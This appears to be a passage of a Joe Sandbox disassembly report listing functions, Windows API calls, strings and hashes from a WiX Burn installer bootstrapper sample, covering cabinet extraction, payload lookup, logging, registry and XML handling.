                                                            • Instruction Fuzzy Hash: DF318176D01229BBDB10DFA99D85ADEFBB8FF04761F110166BD05F7280E6709E4086B0
                                                            APIs
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,00D05405,00D053BD,00000000,00D05445), ref: 00D21506
                                                            • GetLastError.KERNEL32 ref: 00D21519
                                                            • GetExitCodeThread.KERNELBASE(00D4B488,?), ref: 00D2155B
                                                            • GetLastError.KERNEL32 ref: 00D21569
                                                            • ResetEvent.KERNEL32(00D4B460), ref: 00D215A4
                                                            • GetLastError.KERNEL32 ref: 00D215AE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                             • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                            • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                            • API String ID: 2979751695-3400260300
                                                            • Opcode ID: acf193c93aba1bd4b71c1ef138ba30ec367a5a2aef850c0ebf150402fa655291
                                                            • Instruction ID: 50f1d60682d0ac977bc90d93d4614abefec59ac03a9c658f570dda26b2e2b6f9
                                                            • Opcode Fuzzy Hash: acf193c93aba1bd4b71c1ef138ba30ec367a5a2aef850c0ebf150402fa655291
                                                            • Instruction Fuzzy Hash: 0F31D478A00325AFDB10DF699D05AAF7BF8EF65311B10819AFD06D62A0E770CA009B71
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00D02E5F
                                                            • GetLastError.KERNEL32 ref: 00D02E69
                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00D02F09
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00D02F96
                                                            • GetLastError.KERNEL32 ref: 00D02FA3
                                                            • Sleep.KERNEL32(00000064), ref: 00D02FB7
                                                            • CloseHandle.KERNEL32(?), ref: 00D0301F
                                                            Strings
                                                            • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00D02F66
                                                            • pathutil.cpp, xrefs: 00D02E8D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                             • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                            • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                            • API String ID: 3480017824-1101990113
                                                            • Opcode ID: 52e4f8ad6b4ec7a46a8f0b911449ce15d2ec81e212f9372b3d6124e60e881beb
                                                            • Instruction ID: a102e18e1d6ceaca75f1550cb5bbb73eb402c7ac54dc9be9a5977e0a3974532c
                                                            • Opcode Fuzzy Hash: 52e4f8ad6b4ec7a46a8f0b911449ce15d2ec81e212f9372b3d6124e60e881beb
                                                            • Instruction Fuzzy Hash: B5716476D42229ABDB309F59DC4DBAAB7B8AF18720F140195F908E72D0D7749E808F70
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,00D053BD,00000000,00D05489,00D05445,WixBundleUILevel,840F01E8,?,00000001), ref: 00D0CC1C
                                                            Strings
                                                            • Failed to get directory portion of local file path, xrefs: 00D0CCF5
                                                            • Failed to find embedded payload: %ls, xrefs: 00D0CC48
                                                            • Failed to ensure directory exists, xrefs: 00D0CCEE
                                                            • Failed to extract file., xrefs: 00D0CCE7
                                                            • Failed to concat file paths., xrefs: 00D0CCFC
                                                            • Payload was not found in container: %ls, xrefs: 00D0CD29
                                                            • Failed to get next stream., xrefs: 00D0CD03
                                                            • payload.cpp, xrefs: 00D0CD1D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                             • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                            • API String ID: 1825529933-1711239286
                                                            • Opcode ID: 527256dafd045768b99aaeaa0e06b53459e573a1f2fb0282acbf42f1ab7f3a04
                                                            • Instruction ID: c657b6fb4dbc042e4a395a7c4201a3e6f7286582b678f6d2e7e03dc36cee2d6a
                                                            • Opcode Fuzzy Hash: 527256dafd045768b99aaeaa0e06b53459e573a1f2fb0282acbf42f1ab7f3a04
                                                            • Instruction Fuzzy Hash: 1641BE31910219AFCF259F89CC81BAEBBA5FF00710B159279E94DAB2E1D7709D40DBB4
                                                            APIs
                                                            • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 00D047BB
                                                            • GetCurrentThreadId.KERNEL32 ref: 00D047C1
                                                            • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D0484F
                                                            Strings
                                                            • engine.cpp, xrefs: 00D0489B
                                                            • Unexpected return value from message pump., xrefs: 00D048A5
                                                            • Failed to start bootstrapper application., xrefs: 00D0481D
                                                            • Failed to load UX., xrefs: 00D04804
                                                            • wininet.dll, xrefs: 00D047EE
                                                            • Failed to create engine for UX., xrefs: 00D047DB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                             • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Message$CurrentPeekThread
                                                            • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                            • API String ID: 673430819-2573580774
                                                            • Opcode ID: 26dcd517812c13ecd81913a649b43438d47b56710605956c341f0c900031bdff
                                                            • Instruction ID: f4775486aaaf992edaf4397fc7aa9323d6ae74986dbad9bddf94a2c810360504
                                                            • Opcode Fuzzy Hash: 26dcd517812c13ecd81913a649b43438d47b56710605956c341f0c900031bdff
                                                            • Instruction Fuzzy Hash: FF417FB1A00655BFDB149AA4DC85FBA77ACEF05324F104526FA08E6290DB71ED4587B0
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,00D047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00D0548E,?), ref: 00D0D6DA
                                                            • GetLastError.KERNEL32(?,00D047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00D0548E,?,?), ref: 00D0D6E7
                                                            • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 00D0D71F
                                                            • GetLastError.KERNEL32(?,00D047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00D0548E,?,?), ref: 00D0D72B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                             • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AddressLibraryLoadProc
                                                            • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                            • API String ID: 1866314245-2276003667
                                                            • Opcode ID: 5c481c696cc46b87a986f6c3a66e619c948db1a366adb4bb456de60e683728e6
                                                            • Instruction ID: 8ddc557622fbbf5bba95c8486c4d6c422690337406f9e5722200642eb3691b9c
                                                            • Opcode Fuzzy Hash: 5c481c696cc46b87a986f6c3a66e619c948db1a366adb4bb456de60e683728e6
                                                            • Instruction Fuzzy Hash: 3B11C43BA80732ABCB315BD55C05F1B7A95AF05B61F014527BE59EB2D0DB60DC088AF4
                                                            APIs
                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00D49AA6
                                                            • GetLastError.KERNEL32 ref: 00D49AB2
                                                            • DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D49AE1
                                                            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00D49AF2
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00D49B0C
                                                            • GetProcAddress.KERNEL32(?,?), ref: 00D49B74
                                                            • GetLastError.KERNEL32(?,?), ref: 00D49B80
                                                            • DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D49BAF
                                                            • RaiseException.KERNEL32(C06D007F,00000000,00000001,?,?,?), ref: 00D49BC0
                                                            • DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D49BF7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                             • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadReleaseSectionWrite$ErrorExceptionLastLibraryRaise$AddressFreeLoadProc
                                                            • String ID:
                                                            • API String ID: 202095176-0
                                                            • Opcode ID: 928ab591af2880ff58d7c5f4c6c99a072ace062f2a87e76da113a1c17177b54f
                                                            • Instruction ID: c90f29a0238f908dc9bfca618f75cc629fbbe2704ffa004d6ac71e7a3ace418b
                                                            • Opcode Fuzzy Hash: 928ab591af2880ff58d7c5f4c6c99a072ace062f2a87e76da113a1c17177b54f
                                                            • Instruction Fuzzy Hash: 32513C35A006199FDB11DFA6E8E5AAEB7B5EB58361B09016AE901E7350DB70DD00CAB0
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00D0F942
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00D0F94F
                                                            Strings
                                                            • Failed to open registration key., xrefs: 00D0F8AB
                                                            • Failed to format pending restart registry key to read., xrefs: 00D0F846
                                                            • Failed to read Resume value., xrefs: 00D0F8D8
                                                            • %ls.RebootRequired, xrefs: 00D0F82F
                                                            • Resume, xrefs: 00D0F8B6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                             • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                            • API String ID: 3535843008-3890505273
                                                            • Opcode ID: f68e7c1c8c137e30cdfedfa2df5108abb4a26e71e0c2f3e940bd0015192cd81c
                                                            • Instruction ID: 6b901092bb3b1135ee710cb897d706815707a2eb82c0dc49eed4f47f62d6f48a
                                                            • Opcode Fuzzy Hash: f68e7c1c8c137e30cdfedfa2df5108abb4a26e71e0c2f3e940bd0015192cd81c
                                                            • Instruction Fuzzy Hash: 1D412B75900219FFCF21DF98D881BADBBB4FB04310F258176E958AB690C371AE459F60
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00D6B5FC,00000000,?,?,?,00D14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D054FA,?), ref: 00D40533
                                                            • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,00D6B5F4,?,00D14207,00000000,Setup), ref: 00D405D7
                                                            • GetLastError.KERNEL32(?,00D14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D054FA,?,?,?), ref: 00D405E7
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00D14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D054FA,?), ref: 00D40621
                                                              • Part of subcall function 00D02DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00D02F09
                                                            • LeaveCriticalSection.KERNEL32(00D6B5FC,?,?,00D6B5F4,?,00D14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D054FA,?), ref: 00D4067A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                            • String ID: logutil.cpp
                                                            • API String ID: 4111229724-3545173039
                                                            • Opcode ID: dd6c21cf8d5bfccb7008f15b3f8b6a3f347a334a7396b9dfd4760b45c0760245
                                                            • Instruction ID: 66a094a5ee1bd41129ed96d6e16389a2f05c19a1fe3f109d4ba5900b7f40f593
                                                            • Opcode Fuzzy Hash: dd6c21cf8d5bfccb7008f15b3f8b6a3f347a334a7396b9dfd4760b45c0760245
                                                            • Instruction Fuzzy Hash: D3319331901329FFDB11AF659D45EAA7E6DEB00764F060126FA02E72A0D7B1CD609FB0
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00D43309
                                                            • SysAllocString.OLEAUT32(?), ref: 00D43325
                                                            • VariantClear.OLEAUT32(?), ref: 00D433AC
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00D433B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: StringVariant$AllocClearFreeInit
                                                            • String ID: `<u$xmlutil.cpp
                                                            • API String ID: 760788290-3482516102
                                                            • Opcode ID: 406f5eb0d2406f04b948617a252736c365d0564eb26bc428ee7f949de03d9755
                                                            • Instruction ID: 07f34bd17d9a1374bdba829a18af1ad9e4f84fd9cadde4a99be07d98a845fd81
                                                            • Opcode Fuzzy Hash: 406f5eb0d2406f04b948617a252736c365d0564eb26bc428ee7f949de03d9755
                                                            • Instruction Fuzzy Hash: DE216035901219AFCB21DFA9C84CEAEBBB9AF45721F154158F905AB220DB31DE018BB0
                                                            APIs
                                                            Strings
                                                            • Unexpected call to CabWrite()., xrefs: 00D20BC1
                                                            • Failed to write during cabinet extraction., xrefs: 00D20C35
                                                            • cabextract.cpp, xrefs: 00D20C2B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite_memcpy_s
                                                            • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                            • API String ID: 1970631241-3111339858
                                                            • Opcode ID: f0aca306428cf8d50fbb114908ebcd0e4e7fcebc753adbd1d652a557e0b9b944
                                                            • Instruction ID: a6dd5301b3859994636d888cde3db7e5803d1df3af5ddefd095d46f2aafd0218
                                                            • Opcode Fuzzy Hash: f0aca306428cf8d50fbb114908ebcd0e4e7fcebc753adbd1d652a557e0b9b944
                                                            • Instruction Fuzzy Hash: 1921FFB6500220ABCB10CF6CE885D5A3BA8EF94328B254259FE04D7246E671D900DB70
                                                            APIs
                                                            • OpenProcessToken.ADVAPI32(?,00000008,?,00D053BD,00000000,?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D40897
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D408A1
                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D408D3
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D408EC
                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00D1769D,00000000), ref: 00D4092B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                            • String ID: procutil.cpp
                                                            • API String ID: 4040495316-1178289305
                                                            • Opcode ID: dd6e8ad2613ed060368df14889ca96327683965d61508aa5db11648708a405b6
                                                            • Instruction ID: b0cc2eead269ce2912548fe0956b1c7a669d2ea1d82247844e9c8f2e49630186
                                                            • Opcode Fuzzy Hash: dd6e8ad2613ed060368df14889ca96327683965d61508aa5db11648708a405b6
                                                            • Instruction Fuzzy Hash: AB21F636D00229EBE7209F998905A9EBFB8EF15721F054056EE54EB350D370CE00DAF0
                                                            APIs
                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00D20CC4
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D20CD6
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D20CE9
                                                            • CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00D208B1,?,?), ref: 00D20CF8
                                                            Strings
                                                            • Invalid operation for this state., xrefs: 00D20C9D
                                                            • cabextract.cpp, xrefs: 00D20C93
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Time$File$CloseDateHandleLocal
                                                            • String ID: Invalid operation for this state.$cabextract.cpp
                                                            • API String ID: 609741386-1751360545
                                                            • Opcode ID: 3cbdcb8c457e78847ab1c4748ede00d7b6c460750b6e296405c096293fa6aa40
                                                            • Instruction ID: 456a7160f0e7232bde9a8065cd562c2c66218c212c1dd4217af8893c37a6c179
                                                            • Opcode Fuzzy Hash: 3cbdcb8c457e78847ab1c4748ede00d7b6c460750b6e296405c096293fa6aa40
                                                            • Instruction Fuzzy Hash: EA21F372801229AB8B109FA8DC499BA7FACFF143247148256F864D65D1D370E951CBB0
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 00D43574
                                                            • InterlockedIncrement.KERNEL32(00D6B6C8), ref: 00D43591
                                                            • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,00D6B6B8,?,?,?,?,?,?), ref: 00D435AC
                                                            • CLSIDFromProgID.OLE32(MSXML.DOMDocument,00D6B6B8,?,?,?,?,?,?), ref: 00D435B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FromProg$IncrementInitializeInterlocked
                                                            • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                            • API String ID: 2109125048-2356320334
                                                            • Opcode ID: 6d81dcdea1dc0e36cdb26d23180a9e4fe4bc0b4ef589546e8bab406b32771d8e
                                                            • Instruction ID: 0c55a73a461f4e4fe3f7097d2c01924c878a0d006a21c5b183ffbc3b75e98a49
                                                            • Opcode Fuzzy Hash: 6d81dcdea1dc0e36cdb26d23180a9e4fe4bc0b4ef589546e8bab406b32771d8e
                                                            • Instruction Fuzzy Hash: 68F065317403255BD3211FAEBD09B172E69DB92B75F04042BE940DA264D3A0C9898AB0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00D44A9D
                                                            • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00D44ACA
                                                            • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00D44AF6
                                                            • GetLastError.KERNEL32(00000000,00D4B7A0,?,00000000,?,00000000,?,00000000), ref: 00D44B34
                                                            • GlobalFree.KERNEL32(00000000), ref: 00D44B65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Global$AllocFree
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 1145190524-2967768451
                                                            • Opcode ID: a5b58069ad2514dc0cde9bd027a75dfcca13637d853abe73b5d462160407462f
                                                            • Instruction ID: 58bcfa2a6a21886243a960e944e9039245cf1da6a2982f69737dc9d6b0bf29bc
                                                            • Opcode Fuzzy Hash: a5b58069ad2514dc0cde9bd027a75dfcca13637d853abe73b5d462160407462f
                                                            • Instruction Fuzzy Hash: E131A236E40229ABC7219A998C42FAFFAA8EF45760F154156FD54E7341EB30DD408AF4
                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000082,?,?), ref: 00D1E985
                                                            • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00D1E994
                                                            • SetWindowLongW.USER32(?,000000EB,?), ref: 00D1E9A8
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00D1E9B8
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00D1E9D2
                                                            • PostQuitMessage.USER32(00000000), ref: 00D1EA31
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$Proc$MessagePostQuit
                                                            • String ID:
                                                            • API String ID: 3812958022-0
                                                            • Opcode ID: 7c0857375b24d1c08807128adab35755e92173a335872e4a0bc7e436871013f7
                                                            • Instruction ID: 2c700b0e0d24a2b0db3fa263e0edcaff363cb84ee9499c7b1efc92b6ec79ce42
                                                            • Opcode Fuzzy Hash: 7c0857375b24d1c08807128adab35755e92173a335872e4a0bc7e436871013f7
                                                            • Instruction Fuzzy Hash: 87219075104204BFDB119F68EC4DEAA3B65FF55320F584618F90A9A2A5CB31DD90DB70
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00D20B27
                                                            • GetLastError.KERNEL32(?,?,?), ref: 00D20B31
                                                            Strings
                                                            • Invalid seek type., xrefs: 00D20ABD
